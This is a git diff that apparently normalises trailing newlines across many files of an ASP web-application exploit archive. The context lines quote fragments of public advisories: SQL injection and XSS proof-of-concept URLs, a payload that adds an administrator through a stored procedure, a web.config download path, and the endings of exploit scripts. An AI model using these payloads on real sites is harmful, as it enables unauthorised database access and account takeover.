index 23e9f2e3f..6d50a066b 100755 --- a/platforms/asp/webapps/14149.txt +++ b/platforms/asp/webapps/14149.txt @@ -88,4 +88,4 @@ Bug discovered : 1 July 2010 finish(0); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -#End 0Day# +#End 0Day# \ No newline at end of file diff --git a/platforms/asp/webapps/14155.txt b/platforms/asp/webapps/14155.txt index c405b7850..c74ddfffc 100755 --- a/platforms/asp/webapps/14155.txt +++ b/platforms/asp/webapps/14155.txt @@ -23,7 +23,4 @@ http://address/Portal/Research/ResearchPlan/UserStart.aspx Dork: just search for "سیدا" ==================================================================================== -~Blackout Frenzy [http://b0f.ir] - - - +~Blackout Frenzy [http://b0f.ir] \ No newline at end of file diff --git a/platforms/asp/webapps/14168.txt b/platforms/asp/webapps/14168.txt index bddb6c9ed..8357a7c0a 100755 --- a/platforms/asp/webapps/14168.txt +++ b/platforms/asp/webapps/14168.txt @@ -92,4 +92,4 @@ Bug discovered : 1 July 2010 finish(0); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -#End 0Day# +#End 0Day# \ No newline at end of file diff --git a/platforms/asp/webapps/14169.txt b/platforms/asp/webapps/14169.txt index 02307aab5..d02346ab0 100755 --- a/platforms/asp/webapps/14169.txt +++ b/platforms/asp/webapps/14169.txt @@ -98,4 +98,4 @@ Bug discovered : 1 July 2010 finish(0); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -#End 0Day# +#End 0Day# \ No newline at end of file diff --git a/platforms/asp/webapps/1418.txt b/platforms/asp/webapps/1418.txt index e5de32e2d..f0547196e 100755 --- a/platforms/asp/webapps/1418.txt +++ b/platforms/asp/webapps/1418.txt @@ -56,4 +56,4 @@ HTML Example [/code] -# milw0rm.com [2006-01-14] +# milw0rm.com [2006-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/1419.pl b/platforms/asp/webapps/1419.pl index 1d8236afb..c1497d8a8 100755 --- a/platforms/asp/webapps/1419.pl +++ b/platforms/asp/webapps/1419.pl @@ -50,4 +50,4 @@ print "+ Connected!...\n"; print "Exploit failed\n"; print "--------------------------\n"; -# milw0rm.com [2006-01-14] +# milw0rm.com [2006-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/14281.txt b/platforms/asp/webapps/14281.txt index 5feca51ed..89d9b382d 100755 --- a/platforms/asp/webapps/14281.txt +++ b/platforms/asp/webapps/14281.txt @@ -35,7 +35,4 @@ DEMO URL http://www.site.org/demo/KmsoftGB/default.asp?p=2[sqli] ############################################################################################################### -# ..::[ SONiC ]::.. aka the_pshyco - - - +# ..::[ SONiC ]::.. aka the_pshyco \ No newline at end of file diff --git a/platforms/asp/webapps/14283.txt b/platforms/asp/webapps/14283.txt index 0b1f7be1b..c73a4ec81 100755 --- a/platforms/asp/webapps/14283.txt +++ b/platforms/asp/webapps/14283.txt @@ -34,6 +34,4 @@ DEMO URL http://www.site.net/gallery.asp?currentpage=1 [SqLi] ############################################################################################################### -# ..::[ SONiC ]::.. aka the_pshyco - - +# ..::[ SONiC ]::.. aka the_pshyco \ No newline at end of file diff --git a/platforms/asp/webapps/14284.txt b/platforms/asp/webapps/14284.txt index 27f809919..8ef5bd06a 100755 --- a/platforms/asp/webapps/14284.txt +++ b/platforms/asp/webapps/14284.txt @@ -37,6 +37,4 @@ DEMO URL http://www.site.com/igallery34/submitphotos.asp?mi=1 ############################################################################################################### -# ..::[ SONiC ]::.. aka the_pshyco - - +# ..::[ SONiC ]::.. aka the_pshyco \ No newline at end of file diff --git a/platforms/asp/webapps/14704.txt b/platforms/asp/webapps/14704.txt index 795ff64cd..ae06dc02e 100755 --- a/platforms/asp/webapps/14704.txt +++ b/platforms/asp/webapps/14704.txt @@ -58,4 +58,4 @@ Put [SQL CODE] %\\ -############################################################################## +############################################################################## \ No newline at end of file diff --git a/platforms/asp/webapps/14709.txt b/platforms/asp/webapps/14709.txt index b94cc7001..fc4bd78c9 100755 --- a/platforms/asp/webapps/14709.txt +++ b/platforms/asp/webapps/14709.txt @@ -25,4 +25,4 @@ Thanks! -L1nK +L1nK \ No newline at end of file diff --git a/platforms/asp/webapps/1472.pl b/platforms/asp/webapps/1472.pl index d19ff6a67..4855df932 100755 --- a/platforms/asp/webapps/1472.pl +++ b/platforms/asp/webapps/1472.pl @@ -90,4 +90,4 @@ sub usage() print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n"; print "=======================================================================\r\n"; -# milw0rm.com [2006-02-06] +# milw0rm.com [2006-02-06] \ No newline at end of file diff --git a/platforms/asp/webapps/14870.txt b/platforms/asp/webapps/14870.txt index aa3efd044..c90497968 100755 --- a/platforms/asp/webapps/14870.txt +++ b/platforms/asp/webapps/14870.txt @@ -158,5 +158,4 @@ That the value of Email is Abstract column and Password is Title column and With another value like this, we can add an Admin User to CMS with "rb_AddUser" stored procedure: AddExtraSQL:1=1/**/execute/**/dbo.rb_AddUser/**/0,"admin2","admin2@yahoo.com","admin2",null,null;-;-/**/sp_password -For gain better results, for search, you can just select "Announcements" from Module ComboBox. - +For gain better results, for search, you can just select "Announcements" from Module ComboBox. \ No newline at end of file diff --git a/platforms/asp/webapps/14908.txt b/platforms/asp/webapps/14908.txt index 147d5fa38..81fdb779d 100755 --- a/platforms/asp/webapps/14908.txt +++ b/platforms/asp/webapps/14908.txt @@ -47,4 +47,4 @@ http://server/inc_pollingboothmanager.asp?view=results&QuestionID=[sqli] -- With R3gards, -L0rd CrusAd3r +L0rd CrusAd3r \ No newline at end of file diff --git a/platforms/asp/webapps/14913.txt b/platforms/asp/webapps/14913.txt index cc2973844..d96ca6530 100755 --- a/platforms/asp/webapps/14913.txt +++ b/platforms/asp/webapps/14913.txt @@ -71,4 +71,4 @@ http://www.site.com/dmxreadyv2/membersareamanager/membersareamanager.asp?member= ~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~ # 0day n0 m0re # -# L0rd CrusAd3r # +# L0rd CrusAd3r # \ No newline at end of file diff --git a/platforms/asp/webapps/14914.txt b/platforms/asp/webapps/14914.txt index 11ade043d..2523b5791 100755 --- a/platforms/asp/webapps/14914.txt +++ b/platforms/asp/webapps/14914.txt @@ -42,4 +42,4 @@ http://www.site.com/detail.asp?ad_ID=1&vehicletypeID=[sqli] # 0day n0 m0re # -# L0rd CrusAd3r # +# L0rd CrusAd3r # \ No newline at end of file diff --git a/platforms/asp/webapps/14919.txt b/platforms/asp/webapps/14919.txt index d717f1830..fafeaef54 100755 --- a/platforms/asp/webapps/14919.txt +++ b/platforms/asp/webapps/14919.txt @@ -44,4 +44,4 @@ http://server/detail.asp?ad_ID=[sqli] -- With R3gards, -L0rd CrusAd3r +L0rd CrusAd3r \ No newline at end of file diff --git a/platforms/asp/webapps/14969.txt b/platforms/asp/webapps/14969.txt index 27299fccb..aa40ee628 100755 --- a/platforms/asp/webapps/14969.txt +++ b/platforms/asp/webapps/14969.txt @@ -66,4 +66,4 @@ Description : =========================================================================================== - + \ No newline at end of file diff --git a/platforms/asp/webapps/14980.txt b/platforms/asp/webapps/14980.txt index ce17af8cb..f3c2196b4 100755 --- a/platforms/asp/webapps/14980.txt +++ b/platforms/asp/webapps/14980.txt @@ -75,4 +75,4 @@ Description : -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/platforms/asp/webapps/14991.txt b/platforms/asp/webapps/14991.txt index f36545a7f..b65c472c6 100755 --- a/platforms/asp/webapps/14991.txt +++ b/platforms/asp/webapps/14991.txt @@ -36,4 +36,4 @@ Description : =========================================================================================== - + \ No newline at end of file diff --git a/platforms/asp/webapps/14999.txt b/platforms/asp/webapps/14999.txt index e8c26b020..0d026ffb2 100755 --- a/platforms/asp/webapps/14999.txt +++ b/platforms/asp/webapps/14999.txt @@ -74,4 +74,4 @@ Persistent XSS: =========================================================================================== - + \ No newline at end of file diff --git a/platforms/asp/webapps/15018.txt b/platforms/asp/webapps/15018.txt index 04dc8cde9..fbeda1fc3 100755 --- a/platforms/asp/webapps/15018.txt +++ b/platforms/asp/webapps/15018.txt @@ -151,4 +151,4 @@ Then you will receive your alert and script execution. -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/platforms/asp/webapps/15044.txt b/platforms/asp/webapps/15044.txt index dd26fc85d..f5311bf2e 100755 --- a/platforms/asp/webapps/15044.txt +++ b/platforms/asp/webapps/15044.txt @@ -106,4 +106,4 @@ Vulnerable Code: and when Admin see this page, your script will be run. http://localhost/jmdcms/Users.aspx -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/platforms/asp/webapps/15118.txt b/platforms/asp/webapps/15118.txt index 7d5057cb0..6c4122a90 100755 --- a/platforms/asp/webapps/15118.txt +++ b/platforms/asp/webapps/15118.txt @@ -81,5 +81,4 @@ else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); -} - +} \ No newline at end of file diff --git a/platforms/asp/webapps/15124.txt b/platforms/asp/webapps/15124.txt index 17657f636..6255699b9 100755 --- a/platforms/asp/webapps/15124.txt +++ b/platforms/asp/webapps/15124.txt @@ -42,4 +42,4 @@ Description : =========================================================================================== - + \ No newline at end of file diff --git a/platforms/asp/webapps/15139.txt b/platforms/asp/webapps/15139.txt index 09091346f..359bf2c66 100755 --- a/platforms/asp/webapps/15139.txt +++ b/platforms/asp/webapps/15139.txt @@ -34,4 +34,4 @@ Description : -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/platforms/asp/webapps/1514.pl b/platforms/asp/webapps/1514.pl index 7316c1e80..140691138 100755 --- a/platforms/asp/webapps/1514.pl +++ b/platforms/asp/webapps/1514.pl @@ -47,4 +47,4 @@ print "+**********************************************************************+\ # nukedx.com [2006-02-19] -# milw0rm.com [2006-02-19] +# milw0rm.com [2006-02-19] \ No newline at end of file diff --git a/platforms/asp/webapps/15185.txt b/platforms/asp/webapps/15185.txt index fbee694f9..d6b325640 100755 --- a/platforms/asp/webapps/15185.txt +++ b/platforms/asp/webapps/15185.txt @@ -190,4 +190,4 @@ Some of the most basic programming errors are still present in the current release of SmarterMail 7.x (7.2.3925) I'm pusing an update to my clients now on this Stored XSS issue.. Simply filter out -f5d23<\\script>alert(1)<\\/script>eb582083b9d +f5d23<\\script>alert(1)<\\/script>eb582083b9d \ No newline at end of file diff --git a/platforms/asp/webapps/15189.txt b/platforms/asp/webapps/15189.txt index 1ec1e132a..6fc1c5a77 100755 --- a/platforms/asp/webapps/15189.txt +++ b/platforms/asp/webapps/15189.txt @@ -324,4 +324,4 @@ include: Validating Input and a blacklist of strings to hinder this style of attack. There is more to the story.. since I'm just screening applications for -clients, I am pushing out the info as I confirm it manually. +clients, I am pushing out the info as I confirm it manually. \ No newline at end of file diff --git a/platforms/asp/webapps/15199.py b/platforms/asp/webapps/15199.py index 44eef8817..b740ee485 100755 --- a/platforms/asp/webapps/15199.py +++ b/platforms/asp/webapps/15199.py @@ -91,4 +91,4 @@ if __name__ == '__main__': try: indiriyoruz(url2) except IOError: - print '\nFilename not found.' + print '\nFilename not found.' \ No newline at end of file diff --git a/platforms/asp/webapps/15219.py b/platforms/asp/webapps/15219.py index b3332e74f..0ce0fe000 100755 --- a/platforms/asp/webapps/15219.py +++ b/platforms/asp/webapps/15219.py @@ -93,4 +93,4 @@ try: except urllib2.HTTPError: - print "Forbidden Sorry! Server has a Security!" + print "Forbidden Sorry! Server has a Security!" \ No newline at end of file diff --git a/platforms/asp/webapps/15270.txt b/platforms/asp/webapps/15270.txt index 909264f17..7d06d9a25 100755 --- a/platforms/asp/webapps/15270.txt +++ b/platforms/asp/webapps/15270.txt @@ -79,5 +79,4 @@ else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); -} - +} \ No newline at end of file diff --git a/platforms/asp/webapps/1528.pl b/platforms/asp/webapps/1528.pl index 32f2dc87b..f3f65bc07 100755 --- a/platforms/asp/webapps/1528.pl +++ b/platforms/asp/webapps/1528.pl @@ -67,4 +67,4 @@ print "+**********************************************************************+\ # nukedx.com [2006-02-25] -# milw0rm.com [2006-02-25] +# milw0rm.com [2006-02-25] \ No newline at end of file diff --git a/platforms/asp/webapps/1529.htm b/platforms/asp/webapps/1529.htm index b9cac6b23..85802cba6 100755 --- a/platforms/asp/webapps/1529.htm +++ b/platforms/asp/webapps/1529.htm @@ -33,4 +33,4 @@ Save this code as .htm and then execute. # nukedx.com [2006-02-25] -# milw0rm.com [2006-02-25] +# milw0rm.com [2006-02-25] \ No newline at end of file diff --git a/platforms/asp/webapps/15382.txt b/platforms/asp/webapps/15382.txt index 674140e49..215b36a8a 100755 --- a/platforms/asp/webapps/15382.txt +++ b/platforms/asp/webapps/15382.txt @@ -107,5 +107,4 @@ SqlDbType.NVarChar, 100); [#] Exploit :http://Site.Com/DesktopModules/Blog/BlogView.aspx [-][-][-][-][-][-][-](Vulnerabilities)[-][-][-][-][-][-][-] -~~~~~~~~~~~~~~~~[Vulnerabilities]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - +~~~~~~~~~~~~~~~~[Vulnerabilities]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \ No newline at end of file diff --git a/platforms/asp/webapps/15448.txt b/platforms/asp/webapps/15448.txt index 5b04f6a9c..d8c61b691 100755 --- a/platforms/asp/webapps/15448.txt +++ b/platforms/asp/webapps/15448.txt @@ -109,11 +109,4 @@ Ariko-Security Sp. z o.o. Rynek Glowny 12 32-600 Oswiecim tel:. +48 33 4741511 mobile: +48 784086818 -(Mo-Fr 10.00-20.00 CET) - - - - - - - +(Mo-Fr 10.00-20.00 CET) \ No newline at end of file diff --git a/platforms/asp/webapps/15497.txt b/platforms/asp/webapps/15497.txt index 5842ca19e..016c5eb32 100755 --- a/platforms/asp/webapps/15497.txt +++ b/platforms/asp/webapps/15497.txt @@ -41,7 +41,4 @@ http://server/newsroom.asp?specific=-1%20UNION%20ALL%20SELECT%20null,(select%20t Credit: Daikin -bolidebolidebolide@gmail.com - - - +bolidebolidebolide@gmail.com \ No newline at end of file diff --git a/platforms/asp/webapps/1550.txt b/platforms/asp/webapps/1550.txt index a97723d37..b045d0fe3 100755 --- a/platforms/asp/webapps/1550.txt +++ b/platforms/asp/webapps/1550.txt @@ -63,4 +63,4 @@ int main() <--End of code--> <--Thanks |SaMaN| for decrypter--> -// milw0rm.com [2006-03-04] +// milw0rm.com [2006-03-04] \ No newline at end of file diff --git a/platforms/asp/webapps/15544.txt b/platforms/asp/webapps/15544.txt index ae2d93e53..a09638af6 100755 --- a/platforms/asp/webapps/15544.txt +++ b/platforms/asp/webapps/15544.txt @@ -32,4 +32,4 @@ exploit # www.target.com/path/database/NewsPad.mdb >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - WE ARE BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker + WE ARE BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker \ No newline at end of file diff --git a/platforms/asp/webapps/15551.txt b/platforms/asp/webapps/15551.txt index d90310830..56f54d502 100755 --- a/platforms/asp/webapps/15551.txt +++ b/platforms/asp/webapps/15551.txt @@ -34,4 +34,4 @@ ShoutZ ______ All YOGYACARDERLINK CREW, GheMaX, LeQhi -Also Jovita & Fabian :) +Also Jovita & Fabian :) \ No newline at end of file diff --git a/platforms/asp/webapps/15552.txt b/platforms/asp/webapps/15552.txt index b8f3ccf1b..61923fbe4 100755 --- a/platforms/asp/webapps/15552.txt +++ b/platforms/asp/webapps/15552.txt @@ -34,4 +34,4 @@ ShoutZ ______ All YOGYACARDERLINK CREW, GheMaX, LeQhi -Also Jovita & Fabian :) +Also Jovita & Fabian :) \ No newline at end of file diff --git a/platforms/asp/webapps/15553.txt b/platforms/asp/webapps/15553.txt index 5c8689d6f..6bc6018f8 100755 --- a/platforms/asp/webapps/15553.txt +++ b/platforms/asp/webapps/15553.txt @@ -34,4 +34,4 @@ ShoutZ ______ All YOGYACARDERLINK CREW, GheMaX, LeQhi -Also Jovita & Fabian :) +Also Jovita & Fabian :) \ No newline at end of file diff --git a/platforms/asp/webapps/15554.txt b/platforms/asp/webapps/15554.txt index 9074e274a..29e793269 100755 --- a/platforms/asp/webapps/15554.txt +++ b/platforms/asp/webapps/15554.txt @@ -34,4 +34,4 @@ ShoutZ ______ All YOGYACARDERLINK CREW, GheMaX, LeQhi -Also Jovita & Fabian :) +Also Jovita & Fabian :) \ No newline at end of file diff --git a/platforms/asp/webapps/15563.txt b/platforms/asp/webapps/15563.txt index db037d23e..e0d370bfa 100755 --- a/platforms/asp/webapps/15563.txt +++ b/platforms/asp/webapps/15563.txt @@ -36,4 +36,4 @@ Home : datacoders.org ~ ajaxtm.com #Iranian HackerZ Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d ,Raiden , m4hd1 ,P0W3RFU7 - BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker + BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker \ No newline at end of file diff --git a/platforms/asp/webapps/1562.pl b/platforms/asp/webapps/1562.pl index 0ad48e207..f521b83e9 100755 --- a/platforms/asp/webapps/1562.pl +++ b/platforms/asp/webapps/1562.pl @@ -65,4 +65,4 @@ exit(); print "+ Exploit failed :(\n"; print "+**********************************************************************+\n"; -# milw0rm.com [2006-03-07] +# milw0rm.com [2006-03-07] \ No newline at end of file diff --git a/platforms/asp/webapps/15627.html b/platforms/asp/webapps/15627.html index fe0558e19..272c9ea0d 100755 --- a/platforms/asp/webapps/15627.html +++ b/platforms/asp/webapps/15627.html @@ -13,4 +13,4 @@ RESEARCHERS URL: http://underground-stockholm.com/ - + \ No newline at end of file diff --git a/platforms/asp/webapps/15629.txt b/platforms/asp/webapps/15629.txt index b732badf8..55fc0aab9 100755 --- a/platforms/asp/webapps/15629.txt +++ b/platforms/asp/webapps/15629.txt @@ -7,4 +7,4 @@ RESEARCHERS URL: http://underground-stockholm.com/ SQL INJECTION BUGS: http://[host]/[path]/search.asp?selStock=x%27%20union%20selecta -http://[host]/[path]/showAlllistings.asp?orderBy=union +http://[host]/[path]/showAlllistings.asp?orderBy=union \ No newline at end of file diff --git a/platforms/asp/webapps/15665.txt b/platforms/asp/webapps/15665.txt index 9a8d08d3f..c42235737 100755 --- a/platforms/asp/webapps/15665.txt +++ b/platforms/asp/webapps/15665.txt @@ -6,4 +6,4 @@ RESEARCHERS URL: http://underground-stockholm.com/ VULN: -http://[host]/[path]/travelbycountry.asp?country=China%27%20union%20insect +http://[host]/[path]/travelbycountry.asp?country=China%27%20union%20insect \ No newline at end of file diff --git a/platforms/asp/webapps/15673.txt b/platforms/asp/webapps/15673.txt index c7e58222b..1972b3479 100755 --- a/platforms/asp/webapps/15673.txt +++ b/platforms/asp/webapps/15673.txt @@ -13,5 +13,4 @@ Demo : http://server/showbrand.aspx?bc=%27 or 1=(select top 1 table_name from in --------------------- Persian Gulf forever ISCN TEAM -We are Mormoroth - Magicboy - +We are Mormoroth - Magicboy \ No newline at end of file diff --git a/platforms/asp/webapps/1569.pl b/platforms/asp/webapps/1569.pl index 6216d6af5..481dd54b4 100755 --- a/platforms/asp/webapps/1569.pl +++ b/platforms/asp/webapps/1569.pl @@ -52,4 +52,4 @@ if ($res->is_success) { die "\r\n|***| ".$res->status_line; } -# milw0rm.com [2006-03-09] +# milw0rm.com [2006-03-09] \ No newline at end of file diff --git a/platforms/asp/webapps/15690.txt b/platforms/asp/webapps/15690.txt index 4d0e40f97..a21945119 100755 --- a/platforms/asp/webapps/15690.txt +++ b/platforms/asp/webapps/15690.txt @@ -44,4 +44,4 @@ bLaCk.bytE , Satanic2000 # BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker ~ Mikili # [~]######################################### FinisH :D -#############################################[~] +#############################################[~] \ No newline at end of file diff --git a/platforms/asp/webapps/1571.htm b/platforms/asp/webapps/1571.htm index 9fe635510..d254bf74b 100755 --- a/platforms/asp/webapps/1571.htm +++ b/platforms/asp/webapps/1571.htm @@ -54,4 +54,4 @@ Save this code as .htm and then execute. # nukedx.com [2006-03-07] -# milw0rm.com [2006-03-09] +# milw0rm.com [2006-03-09] \ No newline at end of file diff --git a/platforms/asp/webapps/15776.pl b/platforms/asp/webapps/15776.pl index 34f620e67..a7fb036fa 100755 --- a/platforms/asp/webapps/15776.pl +++ b/platforms/asp/webapps/15776.pl @@ -229,5 +229,4 @@ sub banner() { " -ACESS Sql Injection \n". " -by Br0ly \n". " --------------------------------------\n\n"; -} - +} \ No newline at end of file diff --git a/platforms/asp/webapps/15777.txt b/platforms/asp/webapps/15777.txt index b87c770a9..6962034d2 100755 --- a/platforms/asp/webapps/15777.txt +++ b/platforms/asp/webapps/15777.txt @@ -25,4 +25,4 @@ Bug ; carsdetail.asp?arac=[Sql Inj.] twohandscars.asp?marka=[Sql Inj.] ---------------------------------------------------------------------------------------- +--------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/15784.txt b/platforms/asp/webapps/15784.txt index 1ca802c53..7431bb988 100755 --- a/platforms/asp/webapps/15784.txt +++ b/platforms/asp/webapps/15784.txt @@ -64,5 +64,4 @@ E: info@senseofsecurity.com.au Twitter: @ITsecurityAU The latest version of this advisory can be found at: -http://www.senseofsecurity.com.au/advisories/SOS-10-004.pdf - +http://www.senseofsecurity.com.au/advisories/SOS-10-004.pdf \ No newline at end of file diff --git a/platforms/asp/webapps/1589.pl b/platforms/asp/webapps/1589.pl index 81f051bd1..8fe693f8e 100755 --- a/platforms/asp/webapps/1589.pl +++ b/platforms/asp/webapps/1589.pl @@ -64,4 +64,4 @@ sub exploit () { print "- Exploit failed\n" } -# milw0rm.com [2006-03-18] +# milw0rm.com [2006-03-18] \ No newline at end of file diff --git a/platforms/asp/webapps/1597.pl b/platforms/asp/webapps/1597.pl index 381e91869..d149f175a 100755 --- a/platforms/asp/webapps/1597.pl +++ b/platforms/asp/webapps/1597.pl @@ -84,4 +84,4 @@ sub exploit () print "- Exploit failed\n" } -# milw0rm.com [2006-03-20] +# milw0rm.com [2006-03-20] \ No newline at end of file diff --git a/platforms/asp/webapps/16205.txt b/platforms/asp/webapps/16205.txt index bc344f338..019238290 100755 --- a/platforms/asp/webapps/16205.txt +++ b/platforms/asp/webapps/16205.txt @@ -12,5 +12,4 @@ http://site.com/xxx.asp?id=[SQL] XSS --- -http://site.com/diyweb/login.asp?msg=[XSS] -- login page - +http://site.com/diyweb/login.asp?msg=[XSS] -- login page \ No newline at end of file diff --git a/platforms/asp/webapps/1623.pl b/platforms/asp/webapps/1623.pl index 02def2480..96bf9e779 100755 --- a/platforms/asp/webapps/1623.pl +++ b/platforms/asp/webapps/1623.pl @@ -66,4 +66,4 @@ sub exploit () # nukedx.com [2006-03-29] -# milw0rm.com [2006-03-29] +# milw0rm.com [2006-03-29] \ No newline at end of file diff --git a/platforms/asp/webapps/16953.txt b/platforms/asp/webapps/16953.txt index 476774b40..df5224faf 100755 --- a/platforms/asp/webapps/16953.txt +++ b/platforms/asp/webapps/16953.txt @@ -11,4 +11,4 @@ http://site.com/catin.asp?productid=[SQL] POC --- -http://site.com/page.asp?id=23 union select 1 from test.a +http://site.com/page.asp?id=23 union select 1 from test.a \ No newline at end of file diff --git a/platforms/asp/webapps/1700.pl b/platforms/asp/webapps/1700.pl index 2a6e9b77d..805145a02 100755 --- a/platforms/asp/webapps/1700.pl +++ b/platforms/asp/webapps/1700.pl @@ -74,4 +74,4 @@ sub exploit () #nukedx.com [2006-04-19] -# milw0rm.com [2006-04-19] +# milw0rm.com [2006-04-19] \ No newline at end of file diff --git a/platforms/asp/webapps/17011.txt b/platforms/asp/webapps/17011.txt index b4d2a291d..451b7084a 100755 --- a/platforms/asp/webapps/17011.txt +++ b/platforms/asp/webapps/17011.txt @@ -25,5 +25,4 @@ http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=wEB.CoNfiG&OriginalA [1] Unrestricted File Download V1.0 – Windows Server, (URL: http://soroush.secproject.com/blog/2011/01/unrestricted_file_download_v1_0/) # Important Notes: -- Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in the website, we have used all the emails which had been found by searching in Google such as support, info, and so on. - +- Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in the website, we have used all the emails which had been found by searching in Google such as support, info, and so on. \ No newline at end of file diff --git a/platforms/asp/webapps/17015.txt b/platforms/asp/webapps/17015.txt index 9aa2165cc..fee4b2542 100755 --- a/platforms/asp/webapps/17015.txt +++ b/platforms/asp/webapps/17015.txt @@ -15,4 +15,4 @@ Truenex, TsunamiBoom, _tty0, Big, Sunplace, Killerboy,Erick Jordan,Animacco ,yojota, Pablin77, SPEED, Knet, Cereal, MagnoBalt,l0ve, NetToxic, Gusan0r, Sabertrail, Maxi Soler, Darioxhcx,r0dr1,y0u-know. -Dedicatoria especial para SIR +Dedicatoria especial para SIR \ No newline at end of file diff --git a/platforms/asp/webapps/17016.txt b/platforms/asp/webapps/17016.txt index 758a0eee9..4ab9d3d85 100755 --- a/platforms/asp/webapps/17016.txt +++ b/platforms/asp/webapps/17016.txt @@ -14,4 +14,4 @@ Truenex, TsunamiBoom, _tty0, Big, Sunplace, Killerboy,Erick Jordan,Animacco ,yojota, Pablin77, SPEED, Knet, Cereal, MagnoBalt,l0ve, NetToxic, Gusan0r, Sabertrail, Maxi Soler, Darioxhcx,r0dr1,y0u-know. -Dedicatoria especial para SIR +Dedicatoria especial para SIR \ No newline at end of file diff --git a/platforms/asp/webapps/17081.txt b/platforms/asp/webapps/17081.txt index 06c46e934..f85935a15 100755 --- a/platforms/asp/webapps/17081.txt +++ b/platforms/asp/webapps/17081.txt @@ -36,4 +36,4 @@ Net.Edit0r & DarkCoder & fronk & Amir-MaGic & H3x & Milad.C0nn3ct0r #BHG [~] IRANIAN Young HackerZ # Persian Gulf -[~]######################################### FinisH :D +[~]######################################### FinisH :D \ No newline at end of file diff --git a/platforms/asp/webapps/1714.txt b/platforms/asp/webapps/1714.txt index 13184e76c..38827a057 100755 --- a/platforms/asp/webapps/1714.txt +++ b/platforms/asp/webapps/1714.txt @@ -15,4 +15,4 @@ nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00 # Have phun! -# milw0rm.com [2006-04-24] +# milw0rm.com [2006-04-24] \ No newline at end of file diff --git a/platforms/asp/webapps/17176.txt b/platforms/asp/webapps/17176.txt index 95936b8f2..1c3d1e5b1 100755 --- a/platforms/asp/webapps/17176.txt +++ b/platforms/asp/webapps/17176.txt @@ -38,4 +38,4 @@ http://server/softxmlcms/XMLEditor2.0/uploadfile1.asp Greetz : http://Ashiyane.org/Forums -Behrooz_Ice , Q7X , Virangar , Black And All Ashiyane Defacers +Behrooz_Ice , Q7X , Virangar , Black And All Ashiyane Defacers \ No newline at end of file diff --git a/platforms/asp/webapps/17242.txt b/platforms/asp/webapps/17242.txt index 400120330..b4070b779 100755 --- a/platforms/asp/webapps/17242.txt +++ b/platforms/asp/webapps/17242.txt @@ -45,4 +45,4 @@ e-mail : root[at]exploit-id.com # Greets To : KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , All Exploit-Id Team , All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , RmZ ...others -============================================================================================ +============================================================================================ \ No newline at end of file diff --git a/platforms/asp/webapps/17472.txt b/platforms/asp/webapps/17472.txt index 4bc9b8ac3..c71f4765e 100755 --- a/platforms/asp/webapps/17472.txt +++ b/platforms/asp/webapps/17472.txt @@ -14,4 +14,4 @@ http://demo.dmxready.com/applications/CatalogManager/inc_catalogmanager.asp ------------------------------------------------------------------------------------------------------------------------- Bug details; -http://localhost/path//inc_catalogmanager.asp?gpcid=2&cid=4&scid=21&ItemID=[SQLATTACK] +http://localhost/path//inc_catalogmanager.asp?gpcid=2&cid=4&scid=21&ItemID=[SQLATTACK] \ No newline at end of file diff --git a/platforms/asp/webapps/17475.txt b/platforms/asp/webapps/17475.txt index 70c789ad4..47ef4031d 100755 --- a/platforms/asp/webapps/17475.txt +++ b/platforms/asp/webapps/17475.txt @@ -12,7 +12,4 @@ ------------------------------------------------------------------------------------------------- Bug ; -http://target/path/admin/NewsManager/update.asp?ItemID=[SQL ATTACK] - - - +http://target/path/admin/NewsManager/update.asp?ItemID=[SQL ATTACK] \ No newline at end of file diff --git a/platforms/asp/webapps/17478.txt b/platforms/asp/webapps/17478.txt index 6c9505671..c71cbbc38 100755 --- a/platforms/asp/webapps/17478.txt +++ b/platforms/asp/webapps/17478.txt @@ -16,5 +16,4 @@ http://www.dmxready.com/?product=registration-manager Bug; http://target/path/admin/RegistrationManager/update.asp?MemberID=xx [ SQL -ATTACK] - +ATTACK] \ No newline at end of file diff --git a/platforms/asp/webapps/17479.txt b/platforms/asp/webapps/17479.txt index 5205f066b..95dd0f125 100755 --- a/platforms/asp/webapps/17479.txt +++ b/platforms/asp/webapps/17479.txt @@ -13,4 +13,4 @@ Bug; -http://target/path/admin/CatalogManager/update.asp?ItemID=xx[SQL ATTACK] 